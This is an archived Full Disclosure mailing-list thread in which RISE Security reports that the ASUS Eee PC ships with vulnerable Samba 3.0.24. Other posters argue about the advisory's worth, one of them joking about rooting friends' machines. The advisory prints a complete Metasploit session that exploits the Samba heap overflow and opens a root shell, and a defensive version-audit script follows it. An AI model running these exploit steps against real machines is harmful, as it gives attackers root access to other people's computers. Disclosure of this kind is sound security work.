Full Disclosure mailing list archives
Re: ASUS Eee PC rooted out of the box
From: "Erik Harrison" <eharrison () gmail com>
Date: Fri, 8 Feb 2008 16:15:58 -0500
Who cares? Of all the information posted on this list each and every day, you choose this to whine about? Is there no value in knowing that this particular system has a remote-root exploit out of the box? I find this information more valuable than the thousands of SQL injection advisories for tiny software apps that have only ever been downloaded from SF 16 times. Chances are, this is likely more of a real problem that I'm to encounter in my life. The claim that this is 'media hyped' is a bit ridiculous. If this were written for that audience, we probably wouldn't be reading raw process lists or metasploit output. Though I would certainly enjoy seeing this republished in some major newspaper tomorrow, if only to force/embarrass the vendor into patching the default image for these machines when they're shipped - like they should be doing anyway. Is there anything wrong with that? So, thank you for posting this advisory. While technically it's no new information, not a new exploit, I appreciate knowing that I can visit my friends' homes and root their boxes while they order pizza wirelessly on their couch.

On Feb 8, 2008 3:29 PM, reepex <reepex () gmail com> wrote:
yes and no where in here includes 'make some media hyped report & blog crap for 5 minutes of fame'

On Feb 8, 2008 2:27 PM, <keith () securitynow us> wrote:

Security research should go as follows: run some type of scanner to find known issues (low hanging fruit). Use your skill to manually try to find threats, then manually create an exploit, then report the issue after it is verified.

-----Original Message-----
From: reepex <reepex () gmail com>
Sent: Friday, February 8, 2008 2:38pm
To: RISE Security <advisories () risesecurity org>, full-disclosure () lists grok org uk
Subject: Re: [Full-disclosure] ASUS Eee PC rooted out of the box

So you ran metasploit and then made a blog post. Is this what 'security research' is considered now? And why did you write this in such a media hyped way? Trying to get some spotlight?

On Feb 8, 2008 10:47 AM, RISE Security <advisories () risesecurity org> wrote:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

We recently acquired an ASUS Eee PC (if you want to know more about it, a lot of reviews are available on the internet). The first thing we did when we put our hands on the ASUS Eee PC was to test its security.

The ASUS Eee PC comes with a customized version of the Xandros operating system installed, and some other bundled software like Mozilla Firefox, Pidgin, Skype and OpenOffice.org.

Analysing the running processes of the ASUS Eee PC, the first thing that caught our attention was the running smbd process (the sshd daemon was started by us, and is not enabled by default).

  eeepc-rise:/root> ps -e
    PID TTY          TIME CMD
      1 ?        00:00:00 fastinit
      2 ?        00:00:00 ksoftirqd/0
      3 ?        00:00:00 events/0
      4 ?        00:00:00 khelper
      5 ?        00:00:00 kthread
     25 ?        00:00:00 kblockd/0
     26 ?        00:00:00 kacpid
    128 ?        00:00:00 ata/0
    129 ?        00:00:00 ata_aux
    130 ?        00:00:00 kseriod
    148 ?        00:00:00 pdflush
    149 ?        00:00:00 pdflush
    150 ?        00:00:00 kswapd0
    151 ?        00:00:00 aio/0
    152 ?        00:00:00 unionfs_siod/0
    778 ?        00:00:00 scsi_eh_0
    779 ?        00:00:00 scsi_eh_1
    799 ?        00:00:00 kpsmoused
    819 ?        00:00:00 kjournald
    855 ?        00:00:00 fastinit
    857 ?        00:00:00 sh
    858 ?        00:00:00 su
    859 tty3     00:00:00 getty
    862 ?        00:00:00 startx
    880 ?        00:00:00 xinit
    881 tty2     00:00:06 Xorg
    890 ?        00:00:00 udevd
    952 ?        00:00:00 ksuspend_usbd
    953 ?        00:00:00 khubd
   1002 ?        00:00:00 acpid
   1027 ?        00:00:00 pciehpd_event
   1055 ?        00:00:00 ifplugd
   1101 ?        00:00:00 scsi_eh_2
   1102 ?        00:00:00 usb-storage
   1151 ?        00:00:00 icewm
   1185 ?        00:00:01 AsusLauncher
   1186 ?        00:00:00 icewmtray
   1188 ?        00:00:01 powermonitor
   1190 ?        00:00:00 minimixer
   1191 ?        00:00:00 networkmonitor
   1192 ?        00:00:00 wapmonitor
   1193 ?        00:00:00 x-session-manag
   1195 ?        00:00:00 x-session-manag
   1200 ?        00:00:00 x-session-manag
   1201 ?        00:00:00 dispwatch
   1217 ?        00:00:00 cupsd
   1224 ?        00:00:00 usbstorageapple
   1234 ?        00:00:00 kondemand/0
   1240 ?        00:00:00 portmap
   1248 ?        00:00:00 keyboardstatus
   1272 ?        00:00:00 memd
   1279 ?        00:00:00 scim-helper-man
   1280 ?        00:00:00 scim-panel-gtk
   1282 ?        00:00:00 scim-launcher
   1297 ?        00:00:00 netserv
   1331 ?        00:00:00 asusosd
   1476 ?        00:00:00 xandrosncs-agen
   1775 ?        00:00:00 dhclient3
   2002 ?        00:00:00 nmbd
   2004 ?        00:00:00 smbd
   2005 ?        00:00:00 smbd
   2322 ?        00:00:00 sshd
   2345 ?        00:00:00 sshd
   2356 pts/0    00:00:00 bash
   2362 pts/0    00:00:00 ps
  eeepc-rise:/root>

Retrieving the smbd version, we discovered that it runs a vulnerable version of Samba (Samba lsa_io_trans_names Heap Overflow), for which we published an exploit earlier last year.

  eeepc-rise:/root> smbd --version
  Version 3.0.24
  eeepc-rise:/root>

With this information, we ran our exploit against the ASUS Eee PC using the Debian/Ubuntu target (Xandros is based on Corel Linux, which is Debian based).

  msf > use linux/samba/lsa_transnames_heap
  msf exploit(lsa_transnames_heap) > set RHOST 192.168.50.10
  RHOST => 192.168.50.10
  msf exploit(lsa_transnames_heap) > set PAYLOAD linux/x86/shell_bind_tcp
  PAYLOAD => linux/x86/shell_bind_tcp
  msf exploit(lsa_transnames_heap) > show targets

  Exploit targets:

     Id  Name
     --  ----
     0   Linux vsyscall
     1   Linux Heap Brute Force (Debian/Ubuntu)
     2   Linux Heap Brute Force (Gentoo)
     3   Linux Heap Brute Force (Mandriva)
     4   Linux Heap Brute Force (RHEL/CentOS)
     5   Linux Heap Brute Force (SUSE)
     6   Linux Heap Brute Force (Slackware)
     7   DEBUG

  msf exploit(lsa_transnames_heap) > set TARGET 1
  TARGET => 1
  msf exploit(lsa_transnames_heap) > exploit
  [*] Started bind handler
  [*] Creating nop sled....
  ...
  [*] Trying to exploit Samba with address 0x08415000...
  [*] Connecting to the SMB service...
  [*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.50.10[\lsarpc] ...
  [*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.50.10[\lsarpc] ...
  [*] Calling the vulnerable function...
  [+] Server did not respond, this is expected
  [*] Command shell session 1 opened (192.168.50.201:33694 -> 192.168.50.10:4444)
  msf exploit(lsa_transnames_heap) > sessions -i 1
  [*] Starting interaction with 1...

  uname -a
  Linux eeepc-rise 2.6.21.4-eeepc #21 Sat Oct 13 12:14:03 EDT 2007 i686 GNU/Linux
  id
  uid=0(root) gid=0(root) egid=65534(nogroup) groups=65534(nogroup)

Easy to learn, Easy to work, Easy to root.

The original blog post and more information can be found on our website at http://risesecurity.org/.

Best regards,
RISE Security

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)

iD8DBQFHrIeHhFjK78TGSUERAvq7AJ9iz2sHD4/cQ0CdlCC1axNiVhwmJwCfddEd
6tg6XRBCWHfPWFrSdVKu5oA=
=OFwe
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
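The check the quoted advisory walks through (list the processes, spot smbd, read its version, compare it with the release that carries the fix) as an added POSIX sh audit helper; this is example code, not anything RISE Security or the other posters wrote. The fix release 3.0.25 and the sample input are assumptions made here, not values from the thread.

```shell
#!/bin/sh
# Added audit helper (not code from RISE Security or the thread): given the
# text of `ps -e` and `smbd --version`, report whether a host looks like the
# Eee PC above, i.e. smbd running and Samba older than the fixed release.

# Assumption: the lsa_io_trans_names overflow is fixed in Samba 3.0.25. A
# distribution that backported the fix to an older version needs its own value.
FIXED_VERSION="3.0.25"

# Pull "3.0.24" out of a line such as "Version 3.0.24" or "Version 3.0.24-Debian".
samba_version() {
    printf '%s\n' "$1" | sed -n 's/^Version \([0-9][0-9.]*[0-9]\).*/\1/p' | head -n 1
}

# Exit 0 when dotted version $1 is older than $2 (numeric comparison, component
# by component; missing components count as 0), 1 otherwise.
version_lt() {
    awk -v a="$1" -v b="$2" 'BEGIN {
        na = split(a, x, "."); nb = split(b, y, ".")
        n = (na > nb) ? na : nb
        for (i = 1; i <= n; i++) {
            xi = (i <= na) ? x[i] + 0 : 0; yi = (i <= nb) ? y[i] + 0 : 0
            if (xi < yi) exit 0
            if (xi > yi) exit 1
        }
        exit 1
    }'
}

# Exit 0 when the CMD column (4th field of `ps -e` output) names an smbd process.
smbd_running() {
    printf '%s\n' "$1" | awk '$4 == "smbd" { found = 1 } END { exit !found }'
}

# Combine the checks. Exit status: 0 = vulnerable smbd running, 1 = smbd not
# running or at/above the fix release, 2 = smbd running but version unreadable.
samba_audit() {
    smbd_running "$1" || { echo "smbd not running: nothing exposed"; return 1; }
    ver=$(samba_version "$2")
    [ -n "$ver" ] || { echo "smbd running, version unknown: check by hand"; return 2; }
    if version_lt "$ver" "$FIXED_VERSION"; then
        echo "VULNERABLE: smbd $ver running (fixed in $FIXED_VERSION)"; return 0
    fi
    echo "smbd $ver running: at or above $FIXED_VERSION"; return 1
}

# Constructed sample input mirroring the advisory's output (not a live capture).
SAMPLE_PS="  PID TTY          TIME CMD
 2002 ?        00:00:00 nmbd
 2004 ?        00:00:00 smbd"
SAMPLE_VER="Version 3.0.24"
samba_audit "$SAMPLE_PS" "$SAMPLE_VER"
```

On a live host, feed it `"$(ps -e)"` and `"$(smbd --version 2>/dev/null)"`; a non-zero exit with the "nothing exposed" message is the state a shipped image should be in.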